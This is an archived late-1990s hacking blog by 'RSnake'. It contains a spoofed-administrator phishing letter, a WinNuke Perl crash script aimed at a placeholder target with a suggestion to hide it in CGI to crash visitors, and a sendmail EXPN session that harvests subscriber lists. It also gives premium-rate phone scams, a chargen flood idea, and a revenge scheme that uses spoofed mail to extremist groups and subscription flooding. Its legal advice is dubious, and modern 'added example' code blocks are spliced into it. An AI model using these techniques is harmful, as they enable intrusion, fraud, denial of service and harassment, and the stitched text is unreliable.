originally found at http://www.s-alchemy.com/rsnake/siteb.html

SITE B

WELCOME!

Welcome to Site B, the next generation in RSnake's hacking corner. This is my newest site! Now, if you haven't been to my original corner I suggest you visit there before looking any further. This is just more of the same, with some new stuff, better explanations, and more stuff, and did I mention more stuff? I want this site to be as big a hit as my other site was (in its entirety), so if you have any suggestions that could make it even better, please just mail me and tell me what you want to know about. This version (Site B) is NO LONGER hosted by the TCN.

The premise of this specific page is to wean myself away from JUST talking about the software side of hacking. That is why I don't call this page "RSnake's Hacking Corner II" or something of equal awfulness. This page will be devoted not only to the software aspects of hacking, but also to phreaking and social engineering. It will deal with just about every aspect of hacking, as WELL as the software. I will try to make this page more diverse in its content, while still upholding my standards of fact vs. fiction.

Now, once again, I will give you my warnings about the information held on this page. I am merely writing a few thoughts down for educational purposes ONLY! If you go out and do stupid shit on your own, don't come crying to me. If I put stuff on here that is OBVIOUSLY only for breaking and not for hacking (such as the ping bug), understand that it is because I have been thinking about it or have interest in it, not because I think you should go and try it. Big brother IS watching! With that, on with the page!

_________________________________________________________________

--DATE--8-30-97--SOCIAL ENGINEERING--

Hello all! Long time no see! Well, to kick off Site B, and to prove I am a man of my word, my first entry will have to do with social engineering, and NOT exploits.
This is usable by ANYONE and not just the Linux/Unix gurus that you fear so much. Social engineering is the art of hacking PEOPLE. Now, don't think that I am some sort of Nazi trying to get people to conform to an alternate reality or anything; just think of social engineering as the ability to tell a lie that produces some predictable (beneficial) outcome. It is just being a con artist (more or less). First I will give you a usable application, and then talk about it. Let's start with a letter (spoofed) from the Sys-Admin of an internet provider to one of its paying customers:

Dear Customer,

To provide you, the user, with better security, we have recently begun to upgrade our system's security. With the threat of malicious computer hackers ever present, we have decided to beef up our precautionary measures. In doing so, one of our automated password protection systems (APPS) decided that your password is insecure. Normally we wouldn't call your attention to this; however, recently we received notice in our logs of attempts to crack users' passwords. We fear your security could be compromised. Our APPS has provided you with a substitute to your current password that is many times more secure against DES cracking programs. For the time being we HIGHLY suggest you use the password allocated for you (appended automatically to this letter). Please do not reply to this letter directly. If you have further questions or comments, feel free to contact our business office during standard business hours. Below are our APPS program's directions. We ask that you read the directions, write them down along with your new password, and then delete this letter to ensure your privacy. On behalf of our staff, we sincerely apologize for this inconvenience, and will update you if anything else directly concerns you. We hope you find this new service helpful and relatively non-obtrusive. Thank you for your patience and understanding.
-Sincerely,
System Administrator

-------------------APPS PASSWORD CHANGING PROCEDURE-----------------
This is an automated message:
To change your password exit out of your mail and go to your $ prompt, and then type in....
[add your own stuff]
Your new SECURE password to enter: b_/0vG8a
------------------------END APPS PROCEDURE--------------------------

Now obviously this is rough, and hopefully you will have done research on your target, to know how to explain how to change the password. (Note: make SURE your new password has only numbers, letters and symbols (minus @ and # (because of the subtractive nature of those two symbols on many systems)) and NOT control or alt characters.) Most people will do what they are told, unless they have REASON to suspect. Remember to spoof the e-mail (go to my old hacking corner to read on how to do that if you don't already know) so it looks like it is coming from root at that provider. This is one of many tricks you can use to gain remote access on your target machine. Be creative. I have seen at least 20 variations on that theme that would all work. The human machine is very flawed and easily exploited. If you get this kind of e-mail, EVER, mail it to me and your local sys-admin. I know both of us would be very interested to read it. Stay out of trouble! Hasta!

_________________________________________________________________

WORD OF THE DAY: [anisotropic]

RSnake's definition: Say you have a circle that is 2"x2" inside this window. If it was programmed to have isotropic properties, and you changed the horizontal width of your screen (to 4" instead of 8", for instance), the circle would become a vertically elongated ellipse (2" tall and 1" wide) because it is proportionally (to the width) the same. An anisotropic circle, however, wouldn't change, regardless of the dimensions of the screen you were viewing it through.
This is how Netscape, and all other hypertext browsers, handle images, and it is also a fundamental idea when programming in VC++. Hasta!

_________________________________________________________________

--DATE--9-10-97--WHERE TO LOOK--

Hello! Today I am going to hit on where to look for passwords and what to look for when you find yourself in a place that might house something interesting (an office of some sort). People are stupid. They forget things ALL the time. This is something you can take advantage of, BECAUSE, since people don't WANT to forget everything they learn every 10 seconds, they have a tendency to write things down. Well, in computer security, this is a HUGE hazard. If you know where to look, you can find the secrets to get yourself into the strangest of places.

For instance: A friend and I found ourselves needing copies of a paper, so my friend's mother took us into the back of her office, and let us have free rein on the office copy machine. While there, I noticed that was also the same room where the office held their dialup modems and their main system. Within five seconds of random searching I had access to the system. How? They left a sticky note on the side of their computer (away from the door, hoping that no one would be able to see it). Obviously the secretaries had kept forgetting the password to get into the machine, so they wrote it down on a sticky note (nice and yellow for the passer-by hacker to notice).

Where should you look for these obvious places? On the sides of the monitors, on the wall, on file cabinets, in the drawers, on the walls of the drawers, under the desk, under a book, under the keyboard, under the mouse pad.... Places that would be good candidates to look for the password are anywhere that is a "good" hiding place. Just look around. I read once that the two greatest threats to a computer system are the secretaries and temps. Well, in this case the secretaries were the problem.
If you were interested, I didn't exploit the system, since it was a friend, and I instead told the mother that she should change the system's password and gave her a brief talk on computer security. That's where to look. Take it easy! Hasta!

_________________________________________________________________

--DATE--9-12-97--PEDOPHILIA--

I have recently become involved in one of the most vast fights on the internet. This is the fight against pedophilia. I am the founder of a group called EHAP (Ethical Hackers Against Pedophilia). It is not the purpose of this page to talk about it, but if you want more information on this group or its functions, please visit our web-site at http://www.hackers.com/ehap to find out more. Hasta!

_________________________________________________________________

--DATE--9-12-97--SPECIAL CHARACTERS--

On one of the mailing lists that I was on, I received an e-mail about someone who was compiling a program using gcc. The person was annoyed, because "after compiling using: gcc 10int.c -o 10int.c it left behind a file called #10int.c#". Here is my reply:

Ahh, the fun times with "special characters". Well, first of all, if you want to HIDE files, you can use ~'s, as in:

~rsnake

meaning, when they try to cd into ~rsnake they instead go nowhere but to my home directory, unless they know how to get around that... it is really easy. Just type:

rm \#10int.c\#

...the \ says that it is a special character. That is the same way you would get into that directory:

cd \~rsnake

You can use that trick as you like, of course... or even mess with people and call them other users' names... heheh... That file, incidentally, was created not by gcc, but by your editor. It most likely panicked and left that file as a residue when you forcibly quit out. *yawn* Take it easy! Hasta!
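To see what the backslashes are actually protecting against, here is an added shell walkthrough (my example, not RSnake's or his correspondent's) that constructs the two awkward names from the mail in a scratch directory, counts them, removes them with spellings that defeat comment and tilde expansion, and cleans up. All file names and the scratch directory are constructed for the demo.

```sh
#!/bin/sh
# Added example, not code from RSnake's page: recreate the "#10int.c#"
# leftover and a "~rsnake" entry in a scratch directory, count them, remove
# them with spellings that defeat shell expansion, and count again.
# Every path below is constructed for the demo; nothing real is touched.

# Count entries in the current directory whose name starts with '#' or '~'.
count_odd_names() {
    n=0
    for f in ./*; do
        case "${f#./}" in
            '#'*|'~'*) n=$((n + 1)) ;;
        esac
    done
    echo "$n"
}

# Why the naive spellings misbehave (left as comments, since they are the bug):
#   rm #10int.c#    an unquoted word starting with '#' opens a comment, so the
#                   shell runs plain "rm" with no operand; the file survives.
#   cd ~rsnake      tilde expansion first tries to resolve "~rsnake" to the home
#                   directory of a user named rsnake; only if no such user exists
#                   is the word left alone, so the result depends on /etc/passwd.
# The page's backslashes (rm \#10int.c\#, cd \~rsnake) work; a './' prefix or
# single quotes do the same job and are easier to read in scripts, because
# neither '#' nor '~' is special once it is not the first character of the word.
remove_odd_names() {
    rm -f ./'#10int.c#'
    rmdir ./'~rsnake'
}

# Run the whole scenario in a throwaway directory; prints "<before> <after>".
demo() {
    work=$(mktemp -d) || return 1
    (
        cd "$work" || exit 1
        : > '#10int.c#'          # the editor autosave file from the mail
        mkdir '~rsnake'          # a directory literally called "~rsnake"
        before=$(count_odd_names)
        remove_odd_names
        after=$(count_odd_names)
        echo "$before $after"
    )
    status=$?
    rm -rf "$work"
    return $status
}

demo
```

Running it prints "2 0": both odd names exist before the quoted removal and neither survives it.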
In that instance the user mailed me back, and I was right: he had been using Xjed (an Xterm (GUI) version of jed (a larger, more versatile version of ed)) and it had panicked out and left behind that file, and after issuing that command he was able to get rid of it. Simple? Yup! Take it easy! Hasta!

_________________________________________________________________

--DATE--11-13-97--WIN NUKE ETC.--

This is a letter I got in reference to the old Win-Nuke bug. Thought it might be interesting to you people out there. Take it easy...

> Hi,
> Could you explain a little about the win-nuke bug? i.e. port number,
> end result, how to exploit it, etc.
> Thanks

Sure, the bug is simple: when connecting to port 139 on any unpatched NT or 95 machine, all you have to do is send an OOB (out of band) packet and the system faults and blue-screens. The end result is that your computer gets fried. The only way to use this bug is to use a program like win-nuke, or build it in PERL (I have seen it in one line of Perl), to send an OOB packet to the 139 port. I have a copy of winnuke (designed for Linux/UNIX) on my homepage (http://www.s-alchemy.com/rsnake) if you are interested. There is a theory going around that if you telnet to the 139 port and THEN send an OOB packet it will blue-screen patched boxes, but this is NOT true. I designed a program similar to Win-nuke called winnewk and it was unsuccessful in providing any kind of error on patched boxes. After talking directly to Microsoft, it was found that this rumour was bunk and there is no way that it would be possible. Not that it matters... ;)

> p.s. very informative page, latest addition to my bookmarks

Cool... glad to hear it. :) Take it easy. Hasta!

_________________________________________________________________

--DATE--12-13-97--MORE FOOLPROOF HACKS--

I got this letter a while back, and it goes into more of how to get around FoolProof than I went into on my other site.
I want to make something clear to everyone: when I post something on this site, I don't mean that it is the ONLY way to do something; in lots of cases there are other, and perhaps better, ways to get around security. I just put a few thoughts down on this page to let you guys know there IS a way around these types of security. Anyway, here you go... Hasta!

--

hello,
I just stumbled onto your site via skullcap's site, and I am most impressed. I've been a long time Mac guy and know other ways to disable FoolProof (I've been living with it in school for two years straight).

1. Hold down "shift" during startup. This disables all extensions. This rarely works since FoolProof has driver level protection (this works best on crappy Classic II's and what have you). It helps if you flick the power switch up & down a few times to jar it up a little.

2. Hold down the space bar at startup. This only works for System 7.5.x (if it's not, it's probably not worth breaking into anyway). This brings up the Extensions Manager control panel. From here you just uncheck FoolProof and you're set. This is the best way to disable FoolProof that I've seen. Just be sure to turn it on again when you're finished.

3. Write an AppleScript that moves the selected file into another folder other than the System Folder. Have yet to find the syntax on this, haven't worked on it much.

There are other things you can do on a Mac after you've disabled FoolProof. DON'T BE LAME AND REFORMAT THE HARD DRIVE, YOU WILL GET CAUGHT. Instead, install ResEdit and the Forker extension and try to decrypt the password that's stored in the preferences in the System Folder. This isn't really my department but I'm working on that as well and will let you know. Other things to do are to check out www.machacks.com and install some of those pranking files into the computer. Trust me, you want to check out that site if you have a Mac. Anyway, I love your site, keep it cool.
Over and Out

_________________________________________________________________

--DATE--12-15-97--Spoofing DNS in mIRC--

Ever wondered how those "3133t" (3133t = eleet = elite) bastards spoof their DNS and IP addresses in IRC? Well, for the first time it will be explained in plain English (sorta). ;) You know that intro screen in mIRC that lets you provide mIRC with the information it needs to validate your user name etcetera? Well, that is your path to anonymity. Click on that far right tab and find the SOCKS control. That is, find the control that allows mIRC to use SOCKS firewalls. Now, the trick is to find a server that has a firewall that will let you route through it. That is the tricky part. Experiment with bigger providers, as they are more likely to have a SOCKS firewall installed. Now, put that server name into your SOCKS control, and put in a matching e-mail address. I.E.: if the server is asdf.blah.net put in bruno@asdf.blah.net or bruno@blah.net or whatever. It has to be similar to fool anyone. You are now masked AND you are protected by that firewall, because, damnit, you ARE using it as your personal firewall (SOCKS firewall that is). You win twice!! ;) Hasta!

_________________________________________________________________

--DATE--12-16-97--Breaking out of lame security in Win `95--

Stuck using a locked Windows `95 machine? Here are some basic techniques to get you out and free to roam around. First of all, carry a boot disk with you at all times. A boot disk should consist of at least these files:

command.com
autoexec.bat
config.sys

Copy them from your own machine, or an unlocked machine, and put them onto a formatted floppy disk. Then put them into the target machine and cycle the power. That works in many cases to get to a DOS prompt. Another technique is to use Internet Explorer as a shell. How can it be used as a shell? Well, type in "c:" as a URL in the "open" common dialogue box.
It will then give you a directory listing of the machine you are using. From there you are free to roam the system. Also, Microsoft Word and Excel have the same bugs, but they are instead found in the help menu. Explore around, you'll find it. Hasta!

_________________________________________________________________

--DATE--12-17-97--How someone made money off his 800 number--

This is an interesting hack I found out about from a friend working at a university. It is less technical and more social engineering (for those unfamiliar with that term, Social Engineering (S.E. for short) is the art of lying to get information or to get what you want (lying for a purpose vs. lying for shits and giggles)). This hack involved a hacker who was looking for some spare cash. This guy set up his own personal 800 charge number (he set it up to make charges per phone-call, like 900 numbers do). So it was NOT a toll free charge by any means. In fact he made the toll charge extraordinarily high. I am guessing on the order of $10 a minute. So he called up the university, and who knows where else (local numbers only of course), and was routing his number so it was untraceable (beside the point). Then when he got ahold of someone on campus (some lame secretary or something) he told them that he was some professor and he needed to dial out, but couldn't on his phone, but that it was a toll free number. He told her to do it for him, and because she believed it was a toll free number it made sense. Thus, she dialed out and the hacker stayed on the line for hours at a time (hours * $600/hour = a lot of money)!!! If he had more than one phone devoted toward it, he could be making literally thousands of dollars per hour. After thought: he has not been caught yet. ;) Hasta!

_________________________________________________________________

--DATE--12-18-97--Problem in WinGate (new hack)--

WinGate is a program that essentially allows a LAN to connect to the net via a dialup connection or ISDN.
Information on this product can be found at http://www.wingate.net/ The problem lies in that WinGate allows you to telnet to it, and then route out, thereby "laundering" your IP address. This causes you to become untraceable, and WinGate is brilliant in that it doesn't log your address. So unless you are stupid you can get away with it. There are several programs out there to discover what IPs run WinGate, and many more in creation. This is a PRIME target for bulk spammers and spoofers, as well as hackers alike. This could have been fixed by binding it to the inner LAN only. Basically anything you can do on the internet can be done by this unwilling laundry service for your source IP, compliments of WinGate.

_________________________________________________________________

--DATE--12-18-96--Kill Mac with TCP/IP Stack glitch--

Pretty damned simple. Pick yourself up a copy of "strobe" and scan the target machine from the 1st to the 65535th (last) port. It will have TCP/IP overrun and use CPU exhaustion to crash. Pretty simple, I told you. And people thought Macs were safe! Pshaw! Hasta!

_________________________________________________________________

--DATE--12-19-97--Get `em back (revenge)--

Want some real revenge on those assholes who flame you? Well, let's assume for a minute that you DO have their e-mail address. If you don't, then get it; that isn't my problem. Now, I hope you know how to spoof e-mail, because if you don't, you again are screwed. Now, assuming you know the person's e-mail address, and you know how to spoof, send an e-mail spoofed from his/her account to all your local extremists. Send anti-Semitic notes to the Jewish Coalition, and send pro-Semitic stuff to the Nazi or white brotherhood lists. Send core-dumps to the hackers. To every extremist group, send hate-mail to the opposite group from your target's address. If you have the person's phone number or address, tack it on as a phony signature file for good measure.
;) Now how about tangible revenge? Now we are assuming you know the person's real name AND their address (again, if you don't, that isn't my problem (although you might want to try http://www.four11.com)). Go to your local library (be careful doing this because someone might think you are ripping things off), and go through the periodicals section. Then go through every single magazine you can think of that would have subscription cards in them. (You can also do this at grocery stores or book stores, but don't let anyone think you are shoplifting.) Now take all those subscription cards and send them from your target's address. If you get several hundred and fill them all out, I can guarantee you that at least one or two of those (assuming they are subscriptions to catalogues etc...) will sell the address and that person will be floating in junk mail every day from that point on. The best ones to do this with are the R or X rated men's magazines, because they sell addresses most often (they have very few scruples about such things). It will take a few hours out of your day and will cause them more grief than you can know. I don't recommend doing either of these tricks unless you hate the person enough to force them to change e-mail addresses, phone numbers and possibly even move! After thought: most of the best hackers I have known go to the library on a regular basis. Just food for thought. The library is a great place to learn and is a nice change from the stagnant air of the computer labs. ;) Please don't get into any trouble guys/gals. Hasta!

_________________________________________________________________

--DATE--12-21-97--WinNuke in Perl--

Here it is, just a few lines of Perl and you are good to go! Malicious website designers can modify this to kill off any server through CGI (common gateway interface). Imagine if someone stuffed this bad boy into the CGI script on their web page to kill off anyone on a Gates-box.
Make sure to change your.target.com to the actual address you want to kill... or perhaps make it dynamic to kill off people who visit. Hrm... I wonder what the result would be if someone hacked, and then put this on the Micro$oft website?

#!/usr/bin/perl
use IO::Socket;
IO::Socket::INET->new(PeerAddr => "your.target.com:139")
    ->send("bye", MSG_OOB);

_________________________________________________________________

--DATE--12-22-97--How to write and compile C (1st class)--

Well, I am finally going to do it. I am going to write down a couple of thoughts on writing in C. DO NOT ASK ME TO DO IT ANYMORE, as this is a first thing for me, and if I get a whole lot of spam about it, I will stop doing it. Alright?

How do you compile in the programming language C? Well, let's assume you are using Linux or Unix for this task (because damnit, it's better!). From your shell you see a $ or a % or a # or something similar. Now let's say you have your code called "uncompiled_exploit.c" and you want to compile it. It is really very easy. Type in this command:

gcc -o compiled_exploit uncompiled_exploit.c

The first string after the -o is what the compiled code will be called. The uncompiled code will still be there, but it won't run. Now, to run the code you merely type the name of the compiled code into the prompt and voila! The same is true with any C compiler, and even with C++, although dealing with libraries can be very tricky. For the time being let's just stick with that, shall we?

Now let's write our first program in C. Why do I choose C to teach? Because once you know C you can write in C++, but not the reverse. A LOT of the code you will find for exploits is written ONLY in C, and if you have a good basis on what you are doing in C you will understand any code that you encounter (yes, that even includes VC++, sorta). This code is very simple. Type it in EXACTLY as I have it typed.
Spaces and tabs are not important for the most part, but for your first program, just do it exactly as I do for the sake of ease. Feel free to omit the comments:

/* first program: first.c
   this is a comment because it's between the stars and slashes,
   you will just have to get used to these coding conventions */

#include <stdio.h>  /* this is your standard include library for all your c
                       programs. this allows you to use the printf() function
                       used below */

int main()
{
    /* the int main crap is your main function.
       everything between the {}'s is your main function */

    printf("This is how you print a line in C.\n");
    /* the semicolon at the end of the line tells you that that line of code
       is over. the \n means that you want to have a carriage return and
       skip down to the next line. */

    printf("You can also put in tabs and quotes "
           "with the \\t and \" commands: "
           "\"asdf\tasdf\"\n");
    /* \t makes tabs, \b backspaces, etc... if you want to be able to read
       a \ put a slash before it: \\ like in the above example. you also must
       use this same technique when commenting out quotes. you also may span
       commands over several lines, as shown above in the printf() command */

    return 0;
    /* because your main function was declared as an int (an integer) it must
       return a number so that is what the above function does. if you wanted
       to return with an error, you could return with -1, but we will get
       into that later. */
} /* end of main() */

Ok, that was your first program. Now to compile it. At your prompt type:

gcc -o first first.c

If it didn't work, type

ls -la core

and if the line "core not found" comes up, you didn't core dump. If a line comes up other than that, type:

rm core

and you will have to fix whatever problem you made. This shouldn't happen until you get further in your programming, but make sure you type it in carefully, or it won't work. And now to run it just type in:

first

(or ./first if your current directory is not in your PATH). Pretty straightforward? I hope so. ;) Hasta!
_________________________________________________________________

--DATE--1-4-98--EXPN majordomo exploit--

This is a relatively new bug that was uncovered as a vulnerability in sendmail to uncover the subscriber list of a majordomo list. When someone sends an e-mail to a majordomo list the mail is piped through an alias that wraps the message, including some other aliases. One of those aliases also includes the real list with all the e-mail addresses of all the subscribers in it. The potential harm in this is blatantly obvious. To exploit this technique, telnet to the sendmail port of the machine in question, then EXPN the e-mail address of the majordomo list, and then read where the alias goes to. From there, EXPN that alias and poof, you have all the e-mail addresses of all the subscribers. E.G.:

telnet target.net 25
220 target.net ESMP Sendmail 8.8.5/Target-971021-1 ready at ...
EXPN mail-list-name
250 <"/usr/local/mail/majordomo/wrapper resend -l mail-list-name -h target.net mail-list-name-list"@target.net>
EXPN mail-list-name-list

And poof... you will have all the e-mail addresses of all the subscribers of the mailing list. The second EXPN is the second to last argument of the alias (mail-list-name-list). That is where all the account names are stored. Thanks to James Ponder for some of the info here.

_________________________________________________________________

--DATE--1-7-98--How someone made money from his 800 number II--

Alright, you guys remember the guy calling the university, right? Alright, well, I heard this on a news report on my way to go gamble in Reno. Some guy using a normal number (set up like a toll number) calls people, and leaves a distressing message about their father or mother or something getting into an accident, and that they need to contact this number in order to get ahold of this (toll) number. Then when they call the number, it is a machine, set up with broken English, to keep them on the line as long as possible.
Also, this same person has been reported to use pager numbers and other similar scams. He was reported charging as much as $100 a minute (which is a bit hard to believe, but that is what the radio said). After thought: he has not been caught yet. ;) Hasta!

_________________________________________________________________

--DATE--1-22-98--Thoughts--

Well, today I am going to write down a few thoughts (technical, because I have been thinking about them). People often want to know what I am up to these days (because I have been falling out of the public eye a tad), so I will appease that, and also make an entry while I am at it.

First of all, the other day I went into a chatroom (because I was bored) and people started asking me (this was an HTML chat room, by the way) if there was a way to stop the chatroom. Well, frankly, until that time I had never thought about crashing it, but now that I have thought about it for a little while, YES, there IS a way to use CPU exhaustion to basically slow the room down to a halt. I haven't written the program personally, but I can't see that it would be more than 20-30 lines of shell programming at most. You could even do it by hand. It would be using the chargen port. You would connect to the remote HTML port via telnet on a Linux/Unix box and then pipe chargen (off another machine) into it. If you bounced a couple of signals, I am SURE you could crash the room. It would probably not shut down the port, but it would make it so that everyone in the room stopped seeing text, etc...

Next, I was thinking about Kerberos authentication. Here is why I believe Kerberos authentication is a BAD idea for small networks. Unless you have a single machine that is producing the Kerberos certificates, you are running the risk (since it is a multi-user system) that someone can hack the Kerberos machine and get ahold of the primary name server through trust. Trust is evil, and Kerberos THRIVES on trust. If you get a Kerberos ticket you are destined for root.
A friend of mine got on a HUGE (very secure) network through a very small private Linux box on an ISDN (it was an assumed trusted machine (STUPID)). He then used that machine to log into one of the bigger machines (multiuser) and used some social engineering skills to get access to an even bigger machine. And then it was a matter of packet sniffing a sys-admin's password to get access to the primary name server, and then, thanks to Kerberos, he had access to everything (including the ability to add his own machine as a trusted machine). Dumb, if you ask me.

Next. I have been working with a small company designing some really nasty authentication for credit cards, etc. So for the first time, I am working the security aspect of hacking. I got my hands on some fairly interesting RSA source code that allows me to send encrypted data over untrusted lines. The problem lies in that to make this work, I have to make every computer that wants to use this product be able to access C. That might not seem like a problem, but there are lots of systems (ISPs) out there that won't allow C or precompiled binaries to be run. So this is something I am going to have to work out (without recoding PGP into PERL).

Next. I have been asked to write for an internet magazine. Now, I am not sure what I am going to do, but when/if it ever gets off the ground I will let you all know about it. Well... I guess that's it for now... Take it easy all. Hasta!

_________________________________________________________________

--DATE--1-26-98--Making money #3--

Okay, here is one I heard from a friend (sorta). Now this requires some on-site "hacking". Okay, everyone has heard of those department stores, etc., that pay you the difference if they have a discount a week later.
For instance, say something is selling for $45.95 one week, and the next week it goes on sale for $38.95; they guarantee you (the customer) that they will pay you the difference (the $7 in this case) to avoid "bait and hook" lawsuits. So, you find yourself at a department store; what should YOU do to take advantage of this? Well, collect EVERY receipt that you can find. This means in the trashcans out front, and the dumpster out back (if you can get to it), and any that you might happen across while in the store. Then keep your eyes on the local papers for that store. If you happen to notice that something has gone on sale, you just return to that store, and collect the money that is owed to you (the bearer of the receipt). The best part is that (aside from the loitering part) it is completely legal. Stay out of trouble now, you hear? ;) Hasta!

_________________________________________________________________

--DATE--1-29-98--Mail--

> Hi I've read your page
> http://www.s-alchemy.com/rsnake/corner.shtml --kool!
> I'd have a question:
> how do I find out if it's an ELF SYSTEM?
> what commands?
> thanks

Good question, and one that I am unsure of. I will ask a buddy of mine and see if he knows the answer. I listed a few on the page. You may want to ask your system administrator if he knows, in a pinch. I will mail you if I find out. You can find out what kind of system you are using by typing "uname -a" and then you can check the distribution with the manufacturer and ask them if it uses ELF system binaries. That's the only thing I can think of off hand. Hasta!

> thanks very much for that prompt reply. Kool! I've been visiting your
> page and trying exploits, Kool. I've tried the rlogin and it worked!
> Thanks very much, I'll keep on visiting your cool page

Hasta! Well, I talked to my friend, and he came up with some interesting ideas (some of which I slightly disagree with).
He said there is no (good) way to tell if something is an ELF binary by any command; however, there are some things to check so you can narrow down your search. Do an "ls -al /bin/" and if things listed in that directory are large (meaning several hundred k for something fairly simple like "ls") then you are more likely to be sure that it is an ELF system. He also said that you can look at login and see; however, I disagree, as that is sometimes dynamically and sometimes statically compiled, so that is a bad example and could lead you astray. You might also want to do a "strings" command on things found in /bin and that might show if it is an ELF system, but again, I disagree, and I think your best bet is either to talk to the distributor, OR look at things found in /bin and see if they are huge files (anything over 100,000k is huge). I hope that helps. By the way, check out "Site B" sometime; I will put these letters on there. ;) Hasta!

_________________________________________________________________

--DATE--1-30-98--What to do when caught--

I read a REALLY good article in Motorcycle World last August and it stuck with me as being one of the single greatest papers I have read to date. Motorcycle World is about just that, motorcycles. I don't own one personally currently, but I have, and my father does, so I do know quite a bit about the sport, and occasionally I read the magazine when I am home visiting. Regardless, the paper went into what to do when caught on the street by police. For the purposes of this paper, I am not going to cite the article, because I am going to broaden the scope of what was said considerably. A common misconception is that it is illegal to lie to a police officer. This is just plain fallacy. It is ABSOLUTELY legal to lie to police officers in all but two cases. The first is if the officer asks your identity, and the second is if you are NOT a suspect in a crime (as that is considered hindering an ongoing investigation).
However, on the flip side, officers ARE allowed to lie to you. It is a known statistic that 90% of all convictions are made by confession alone. A police officer doesn't have to prove a thing if you confess. So how does an officer get you to confess? Well, in the example the paper used, when a policeman pulls you over off the side of the road, he first asks you "How fast do you think you were going?" Most people would either say, "I don't know" or tell the police officer EXACTLY how fast they were going. This is considered a confession. What SHOULD you do? Well, I am not TELLING you to lie, but let's put it this way: unless they used official methods of checking your speed (clocking your speed over a certain length of road, or radar checks in approved radar zones) they cannot convict you of anything. By admitting to the fact that you were going however fast you were going, you are giving up your constitutional rights. Police officers are (this is the God's honest truth here) TOLD to lie during police academy, to make dealing with criminals and the public as a whole easier. I can remember a few times when I was pulled over for various reasons, but once when I was speeding, the officer asked me what the speed limit was, and I told him 35, and he asked me how fast I was going, and I responded, "I believe I was going 35, sir." He told me that I was going quite a bit above that (which I probably was, knowing me and that particular street), but because he couldn't prove it, and I didn't admit to it, he had no reason to write me a ticket. Our very own Central Intelligence Agency (CIA) knows this fact all too well, as their inside motto is: "Admit nothing. Deny everything. Make counter-accusations." The people who are least likely to get traffic violations are lawyers and ex-cons. Food for thought. The reason being, they know their constitutional rights.

More on the traffic issues: There is a way of getting a ticket without anyone being around, and this is "photo radar".
They have cameras at street intersections and they take a picture of your front license plate if you disobey common road safety laws. What do you do if you receive a ticket like this in the mail? Well, according to the ex-police officer in this article, you should completely ignore it. The ticket does NOT go on your DMV record, and is just a way to generate revenue for the state. Photo traffic violations do not constitute "service of summons". If you receive a ticket like this via registered mail, refuse to sign, thereby forcing the people who wrote the ticket to hire someone to process the ticket at considerable expense. In most cases these tickets will be dropped immediately, because it will cost the state more money to try to get the money from you than if they just ignore your particular violation.

The point of this being: know your rights. Remain silent when arrested. Talk to your attorney first. Know that you CAN lie to police officers. Know that police officers DO lie to you. Also, be NICE when talking to police officers. They have a shitty job to do, and I think we can all sympathize with that. They are much friendlier and much easier to deal with when you are nice to them. They just want the respect that they (in most cases) deserve. Smile! Take care out there folks, and stay out of trouble! Hasta!

_________________________________________________________________

--DATE--1-30-98--Mail--

> hello rsnake, I got a small question if you have time to answer. I
> recently got a hotmail account and I noticed they show TONS of
> information about the sender of mail. Is there a way to see that
> information on normal email (the one that came with my prodigy)? I'm
> using netscape navigator 3.0 if you need to know that information. Any
> help would be appreciated, thanks.

Hrm, are you referring to header information? If so, just save the document (go to File, then go down to Save As) into an HTML document on your hard drive.
Then just view that source with Notepad or something similar. That will reveal headers. If you aren't talking about headers, I am not sure what you are referring to. Hope that helps. Hasta!

> Rsnake, the header information is exactly what I was referring to. I
> know it's only superficial information but I couldn't figure out a way to
> access it. Now that brings up another question: if I save it into an
> html format, could that activate a virus that was inside? Or can you
> only get one by downloading an attached file? I hate to bother you so
> much, but you're one of the few people that gives straight answers. Thanks
> a lot for your help.

Hehe... Okay, yes, it is possible to execute a virus if you convert an e-mail to HTML AND view it through an HTML editor/browser. However, the virus would have to be written in either JavaScript or VBScript (if you view the document through MSIExplorer). If it is written in any other language, it would have to be run. If you save the document, it will not save attachments, however, so you are pretty safe from that. I wouldn't recommend viewing headers through a browser though, because it will misinterpret certain characters as part of HTML. Use Notepad or WordPad, open it as a .txt file, and all will be good. Hope that helps. Hasta!

_________________________________________________________________

--DATE--1-31-98--CHFN Vulnerability (possible)--

Hrm... well, while playing around on a local system (that I have access to), I noticed something interesting. There is a Linux/Unix command called chfn (change finger name) used to change information about a user (such as home address, home phone, "real name", etc...). Anyway, while playing around with it, I noticed that it opened an editor to change this information. I am not sure of the version of chfn that I was using, but if yours doesn't open up an editor, you can be sure that this is NOT the version you are using.
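An added example (mine, not the page's or chfn's code) for the temporary-file problem this entry goes on to describe: a privileged program writing to a guessable /tmp name, where a pre-planted symbolic link redirects the write. It shows the weak pattern beside two hardened forms and a pre-flight check; only the "chpass." prefix comes from the page, the rest is constructed, and it assumes a POSIX system with a writable /tmp.

```c
/* Added example, not the page's code: guessable temp names vs. safe creation.
 * Only the "chpass." prefix mirrors the page; everything else is constructed. */
#define _DEFAULT_SOURCE
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <time.h>

/* Weak pattern: the name is derived from the clock, so it is guessable, and
 * O_CREAT without O_EXCL follows whatever already sits at that path. */
int open_tmp_weak(char *path, size_t pathlen)
{
    snprintf(path, pathlen, "/tmp/chpass.%06ld", (long)(time(NULL) % 1000000));
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened pattern 1: mkstemp picks a random suffix and creates the file
 * atomically with O_EXCL; the XXXXXX in path is replaced in place. */
int open_tmp_safe(char *path, size_t pathlen)
{
    snprintf(path, pathlen, "/tmp/chpass.XXXXXX");
    return mkstemp(path);
}

/* Hardened pattern 2, for code that must keep a fixed name: O_EXCL refuses
 * any existing entry (a planted link included) and O_NOFOLLOW never follows one. */
int open_fixed_name_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Pre-flight check: 1 if nothing exists at path or it is a regular file we
 * own, 0 if something suspicious (a symlink, another owner) is already there. */
int tmp_path_is_clean(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0) return 1;   /* nothing there yet */
    if (S_ISLNK(st.st_mode)) return 0;     /* planted link: refuse */
    if (!S_ISREG(st.st_mode)) return 0;
    return st.st_uid == getuid();
}

int main(void)
{
    char path[64];
    int fd = open_tmp_safe(path, sizeof path);
    if (fd < 0) { perror("mkstemp"); return 1; }
    printf("created %s (clean=%d)\n", path, tmp_path_is_clean(path));
    close(fd);
    unlink(path);
    return 0;
}
```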
